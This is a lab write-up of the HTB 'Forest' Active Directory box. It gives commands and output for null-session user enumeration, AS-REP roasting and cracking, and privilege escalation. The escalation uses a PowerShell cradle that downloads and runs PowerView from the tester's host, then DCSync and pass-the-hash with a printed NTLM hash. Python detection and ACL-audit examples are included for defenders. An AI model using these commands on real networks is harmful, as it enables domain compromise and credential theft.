HTB Forest

Summary

Forest is an easy-rated retired box on HTB focused on Active Directory attacks. SMB permitted null-session logons, which enabled us to obtain a list of users on the host. This allowed us to perform an AS-REP roasting attack followed by an offline crack, which granted us initial access. Using this account, we were able to create an account in the Exchange Windows Permissions group and then grant it DCSync rights. This was then used to retrieve the DC Administrator's NTLM hash, which was passed to gain elevated privileges.

Service Enumeration

port      protocol   version                                    notes
53/tcp    DNS        Simple DNS Plus
88/tcp    Kerberos   Microsoft Windows Kerberos
389/tcp   LDAP       Microsoft Windows Active Directory LDAP    Domain: htb.local
445/tcp   SMB        Windows Server 2016 Standard               workgroup: HTB

Note: Kerberos + LDAP + DNS likely indicates Active Directory Domain Controller.

Nmap Scan results


Nmap scan report for 10.129.97.129
Host is up, received user-set (0.049s latency).
Scanned at 2023-09-30 14:36:17 UTC for 22s
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE      REASON          VERSION
53/tcp   open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-09-30 14:43:14Z)
135/tcp  open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?    syn-ack ttl 127
593/tcp  open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack ttl 127
3268/tcp open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack ttl 127
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m51s, deviation: 4h02m32s, median: 6m49s
| smb2-time: 
|   date: 2023-09-30T14:43:18
|_  start_date: 2023-09-30T14:41:18
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25163/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 21357/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 47088/udp): CLEAN (Timeout)
|   Check 4 (port 14646/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-09-30T07:43:22-07:00


The initial Nmap scan revealed a combination of DNS + Kerberos + LDAP, which appeared to indicate that this machine was an Active Directory Domain Controller.

Accordingly, username enumeration was attempted against the other discovered protocols, beginning with SMB. This was performed using CrackMapExec:


└─$ crackmapexec smb 10.129.97.129 -u '' -p '' --users
SMB         10.129.97.129   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.97.129   445    FOREST           [+] htb.local\: 
SMB         10.129.97.129   445    FOREST           [-] Error enumerating domain users using dc ip 10.129.97.129: NTLM needs domain\username and a password
SMB         10.129.97.129   445    FOREST           [*] Trying with SAMRPC protocol
SMB         10.129.97.129   445    FOREST           [+] Enumerated domain user(s)
SMB         10.129.97.129   445    FOREST           htb.local\Administrator                  Built-in account for administering the computer/domain
SMB         10.129.97.129   445    FOREST           htb.local\Guest                          Built-in account for guest access to the computer/domain
SMB         10.129.97.129   445    FOREST           htb.local\krbtgt                         Key Distribution Center Service Account
SMB         10.129.97.129   445    FOREST           htb.local\DefaultAccount                 A user account managed by the system.
SMB         10.129.97.129   445    FOREST           htb.local\$331000-VK4ADACQNUCA           
SMB         10.129.97.129   445    FOREST           htb.local\SM_2c8eef0a09b545acb           
SMB         10.129.97.129   445    FOREST           htb.local\SM_ca8c2ed5bdab4dc9b           
SMB         10.129.97.129   445    FOREST           htb.local\SM_75a538d3025e4db9a           
SMB         10.129.97.129   445    FOREST           htb.local\SM_681f53d4942840e18           
SMB         10.129.97.129   445    FOREST           htb.local\SM_1b41c9286325456bb           
SMB         10.129.97.129   445    FOREST           htb.local\SM_9b69f1b9d2cc45549           
SMB         10.129.97.129   445    FOREST           htb.local\SM_7c96b981967141ebb           
SMB         10.129.97.129   445    FOREST           htb.local\SM_c75ee099d0a64c91b           
SMB         10.129.97.129   445    FOREST           htb.local\SM_1ffab36a2f5f479cb           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxc3d7722           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxfc9daad           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxc0a90c9           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox670628e           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox968e74d           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox6ded678           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox83d6781           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxfd87238           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxb01ac64           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox7108a4e           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox0659cc1           
SMB         10.129.97.129   445    FOREST           htb.local\sebastien                      
SMB         10.129.97.129   445    FOREST           htb.local\lucinda                        
SMB         10.129.97.129   445    FOREST           htb.local\svc-alfresco                   
SMB         10.129.97.129   445    FOREST           htb.local\andy                           
SMB         10.129.97.129   445    FOREST           htb.local\mark                           
SMB         10.129.97.129   445    FOREST           htb.local\santi                          

This output was saved to a file called users.txt and filtered with a short Bash pipeline to extract the bare usernames:


└─$ cat users.txt | cut -d '\' -f 2 | grep -v "Health" | grep -v "SM_" | grep -v '\$' | cut -d " " -f 1 | grep -v "SMB" | grep -v ':' | grep -v "username" > userlist.txt

This yielded:


Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi

After retrieving a valid username list, crackmapexec was then used to perform an AS-REP roasting attack against every user in the list, which returned an AS-REP hash for a single account, svc-alfresco:


└─$ crackmapexec ldap -dc-ip 10.129.97.129 -u userlist.txt -p '' --asreproast asrep_hashes.txt
SMB         10.129.97.129   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:c-ip) (signing:True) (SMBv1:True)
LDAP        10.129.97.129   445    FOREST           $krb5asrep$23$svc-alfresco@HTB.LOCAL:d28eeca1f5485edfe56db9007bae6338$2a3bd48c703349104c02e49b63d5ba6bf53b45aba6fc7695cc856273a5eff3372c5a20dde225168c98bfdd0719590cebf9e15ee46fddbb8109843db53ea72d80c508abb8f58c8f486bd7938bd9e79eecbfe21c34d5ed495c3dc0a1bc86d20bf74022adeca2b59ad76d5c11a8e0de1846a2b5a790d4e4a76128d3d34902345ac6f43a7f04f94d85437c985b9f98d38bdec566484986902eac0d8731f6659fca0767e03d8c641cb2fa60caaf8578f0321aacf31b5fcea530a0b13b4da7d93e94257592396b7c749c8dde7fb5b6f042df52164c1c3b67f981b018c9c27217ddc5b62e470208f3ce

After retrieving the hash, Hashcat was utilized with the rockyou wordlist in order to perform an offline crack:


└─$ hashcat -m 18200 asrep_hashes.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

This successfully returned the password s3rvice.

This password was then used to log on as svc-alfresco over WinRM using crackmapexec.


└─$ crackmapexec winrm -dc-ip 10.129.97.129 -u svc-alfresco -p s3rvice

Vulnerability Explanation

Allowing anonymous (null-session) SMB logons lets attackers enumerate domain usernames. This includes the names of service accounts that may be vulnerable and that are difficult to discover through OSINT sources.

Vulnerability Fix

Ensure that SMB requires authentication for access and that null sessions cannot be used to enumerate domain users.

Severity

Assessed CVSS 3.1: 5.1 MEDIUM

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:X/RL:O/RC:X/CR:M/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:N/MA:N

Proof Of Concept Code

Issue was caused by misconfiguration; no exploit needed.

Vulnerability Explanation

When an account is configured to not require Kerberos pre-authentication, an attack called AS-REP roasting becomes possible: anyone who can reach the KDC can request a TGT for that account and receive an AS-REP encrypted with the account's password-derived key, which can then be cracked offline.

Vulnerability Fix

Per Alfresco's documentation, disabling pre-authentication is necessary for functionality. Accordingly, enabling pre-authentication cannot be recommended. However, please consider:

  • Ensure that svc-alfresco uses a very strong password (longer than 12 characters, using letters, digits and symbols) that has been confirmed not to appear in any known leak.

As a monitoring option, honeypot accounts can be set up that do not require pre-authentication. These can then be monitored for Windows Security event ID 4768 (a Kerberos authentication ticket, TGT, was requested). If such events are logged for the honeypot accounts (which should never be used), it can be assumed that an attacker has attempted AS-REP roasting across the domain's accounts. This can be used to engage the SOC to initiate the incident response plan.
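As an added example, not part of the original writeup, the detection logic behind that honeypot approach in Python, run over constructed 4768 events shaped like the event's EventData fields. The honeypot account name, the exempt-account list and the spray threshold are assumptions.

```python
from collections import defaultdict

# Assumptions (not from the writeup): the honeypot account was created with
# "Do not require Kerberos preauthentication" and is never used by a real process;
# svc-alfresco is the account the writeup says legitimately needs pre-auth disabled.
HONEYPOT_ACCOUNTS = {"svc-backup-legacy"}
PREAUTH_EXEMPT = {"svc-alfresco"}
SPRAY_THRESHOLD = 4  # distinct account names requested from one client address


def analyze_4768(events):
    """Classify 4768 (TGT requested) events; returns alert messages keyed by severity."""
    alerts = {"critical": [], "high": [], "medium": []}
    accounts_by_ip = defaultdict(set)
    for ev in events:
        user = ev["TargetUserName"].lower()
        ip = ev["IpAddress"].replace("::ffff:", "")  # 4768 records IPv4-mapped IPv6 addresses
        accounts_by_ip[ip].add(user)
        if user in HONEYPOT_ACCOUNTS:
            alerts["critical"].append(f"honeypot {user}: TGT request from {ip}")
        # PreAuthType 0 with Status 0x0 means the KDC issued an AS-REP without any
        # pre-authentication: exactly the material an AS-REP roast cracks offline.
        elif ev["PreAuthType"] == "0" and ev["Status"] == "0x0" and user not in PREAUTH_EXEMPT:
            alerts["high"].append(f"no-preauth AS-REP issued for {user} from {ip}")
    for ip, users in accounts_by_ip.items():
        if len(users) >= SPRAY_THRESHOLD:
            alerts["medium"].append(f"{ip} requested TGTs for {len(users)} accounts: {sorted(users)}")
    return alerts


# Constructed sample events; field names follow the 4768 EventData XML.
SAMPLE_EVENTS = [
    # normal workstation logon: PA-ENC-TIMESTAMP pre-authentication (type 2)
    {"TargetUserName": "andy", "IpAddress": "::ffff:10.129.97.50", "PreAuthType": "2", "Status": "0x0"},
    # one client walking a username list without pre-auth; 0x6 = client principal unknown
    {"TargetUserName": "sebastian", "IpAddress": "::ffff:10.10.14.53", "PreAuthType": "0", "Status": "0x6"},
    {"TargetUserName": "lucinda2", "IpAddress": "::ffff:10.10.14.53", "PreAuthType": "0", "Status": "0x6"},
    {"TargetUserName": "svc-alfresco", "IpAddress": "::ffff:10.10.14.53", "PreAuthType": "0", "Status": "0x0"},
    {"TargetUserName": "svc-sql", "IpAddress": "::ffff:10.10.14.53", "PreAuthType": "0", "Status": "0x0"},
    {"TargetUserName": "svc-backup-legacy", "IpAddress": "::ffff:10.10.14.53", "PreAuthType": "0", "Status": "0x0"},
]

if __name__ == "__main__":
    for severity, msgs in analyze_4768(SAMPLE_EVENTS).items():
        for msg in msgs:
            print(f"[{severity}] {msg}")
```

Only successful AS-REPs without pre-authentication are flagged as high, because a normal client's first AS-REQ is also answered with a pre-authentication-required error and must not page anyone.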

Severity

Assessed CVSS 3.1: 5.8 MEDIUM

AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Proof Of Concept Code

Issue resulted from configuration issues; no exploit code used.

Proof Screenshot

Proof Text

b6a5893ec7a691208692b70ad2eff351

Privilege Escalation

Upon gaining valid credentials on the domain, bloodhound-python was used to collect domain information.


└─$ bloodhound-python -u svc-alfresco -p s3rvice --zip -d HTB.LOCAL -ns 10.129.97.129

The information returned was then imported into Bloodhound and examined.

Our owned account, svc-alfresco, was determined to be a member of the Account Operators group, which enabled the creation of a new account and its addition to the Exchange Windows Permissions group. This group, in turn, has the WriteDACL permission, which can be used to grant the new account DCSync rights.

Creating the new account and adding it to the required groups:


net user aquantis 12345qwerty /add /domain

net group "Exchange Windows Permissions" aquantis /add

net localgroup "Remote Management Users" aquantis /add

PowerView.ps1 was then transferred to the remote host over HTTP using a combination of Python's http.server module and certutil on the remote host. The PowerView module was then loaded and used to add DCSync rights to the aquantis account.


(New-Object System.Net.WebClient).DownloadString('http://10.10.14.53:8000/powerview.ps1') | IEX
$SecPass = ConvertTo-SecureString '12345qwerty' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\aquantis', $SecPass)
Add-ObjectACL -PrincipalIdentity aquantis -Credential $Cred -Rights DCSync

Once aquantis had been granted the correct permissions, a DCSync attack was performed:


└─$ impacket-secretsdump -just-dc aquantis:12345qwerty@10.129.97.129 -outputfile dcsync_hashes

This resulted in all hashes for the domain being returned, including the DC Administrator's NTLM hash:


htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

This hash was then used in a pass-the-hash attack to remotely run commands with elevated privileges on the domain controller:


crackmapexec smb 10.129.97.129 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -d htb.local -x "type C:\Users\Administrator\Desktop\root.txt"

Vulnerability Explanation

DCSync abuses the directory replication rights of Active Directory, which are intended to allow Domain Controller machine accounts to replicate domain information between the domain controllers in a deployment.

Any account that has DCSync rights is thus able to retrieve any password hash on the domain, including the domain administrator's.

Vulnerability Fix

Consider auditing permissions on the domain object to ensure that high-risk or low-privilege accounts and groups do not hold DCSync (directory replication), WriteDACL or GenericAll rights.
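As an added example, not part of the writeup, a Python audit over the domain head's ACL (as exported, for instance, with Get-Acl on the AD: drive) that flags principals holding either both replication extended rights (DCSync) or DACL control that would let them grant those rights. The ACE dict layout, the EXPECTED allowlist and the sample ACL are constructed for illustration; the sample models the end state described above.

```python
from collections import defaultdict

# Extended-right GUIDs as they appear in the domain head's ACL (e.g. Get-Acl "AD:\DC=htb,DC=local").
REPL_RIGHTS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "get-changes",       # DS-Replication-Get-Changes
               "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "get-changes-all"}  # DS-Replication-Get-Changes-All
ANY_OBJECT = "00000000-0000-0000-0000-000000000000"  # ACE not scoped to one object type or right
DACL_CONTROL = {"WriteDacl", "WriteOwner", "GenericAll"}
# Principals expected to replicate or control the domain head (assumption; tailor per domain).
EXPECTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "HTB\\Domain Admins", "HTB\\Enterprise Admins",
            "HTB\\Domain Controllers", "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS"}

def audit_domain_acl(aces):
    """Map each unexpected principal to what its Allow ACEs let it do. Each ACE is a dict with
    IdentityReference, AccessControlType, ActiveDirectoryRights (comma-separated) and ObjectType."""
    caps = defaultdict(set)
    for a in aces:
        if a["AccessControlType"] != "Allow":
            continue
        who, obj = a["IdentityReference"], a["ObjectType"].lower()
        rights = {r.strip() for r in a["ActiveDirectoryRights"].split(",")}
        if "GenericAll" in rights and obj == ANY_OBJECT:  # GenericAll implies every extended right
            caps[who] |= set(REPL_RIGHTS.values()) | {"dacl-control"}
        if "ExtendedRight" in rights and obj in REPL_RIGHTS:
            caps[who].add(REPL_RIGHTS[obj])
        if rights & DACL_CONTROL and obj == ANY_OBJECT:
            caps[who].add("dacl-control")
    findings = {}
    for who, c in caps.items():
        if who in EXPECTED:
            continue
        if set(REPL_RIGHTS.values()) <= c:  # both replication rights are needed to pull secrets
            findings[who] = "DCSync-capable"
        elif "dacl-control" in c:           # can write the replication ACEs onto the domain head
            findings[who] = "can grant itself DCSync"
    return findings

def ace(who, rights, obj):  # shorthand for building the constructed sample below
    return {"IdentityReference": who, "AccessControlType": "Allow",
            "ActiveDirectoryRights": rights, "ObjectType": obj}

# Constructed ACL modelled on the writeup's end state: Exchange Windows Permissions holds
# WriteDacl on the domain head and aquantis has been granted both replication rights.
SAMPLE_ACL = [
    ace("HTB\\Domain Controllers", "ExtendedRight", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ace("HTB\\Domain Controllers", "ExtendedRight", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ace("HTB\\Exchange Windows Permissions", "WriteDacl, ReadProperty", ANY_OBJECT),
    ace("HTB\\aquantis", "ExtendedRight", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ace("HTB\\aquantis", "ExtendedRight", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
]
```

Running audit_domain_acl(SAMPLE_ACL) reports Exchange Windows Permissions as able to grant itself DCSync and aquantis as already DCSync-capable, while the expected Domain Controllers entry is not flagged.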

Severity

Assessed CVSS 3.1: 7.6 HIGH

AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Proof Of Concept Code

Issue is caused by configuration settings; no exploit code needed.

Proof Screenshot

Proof Text

92927acd0ceb4e58131da3ed03276734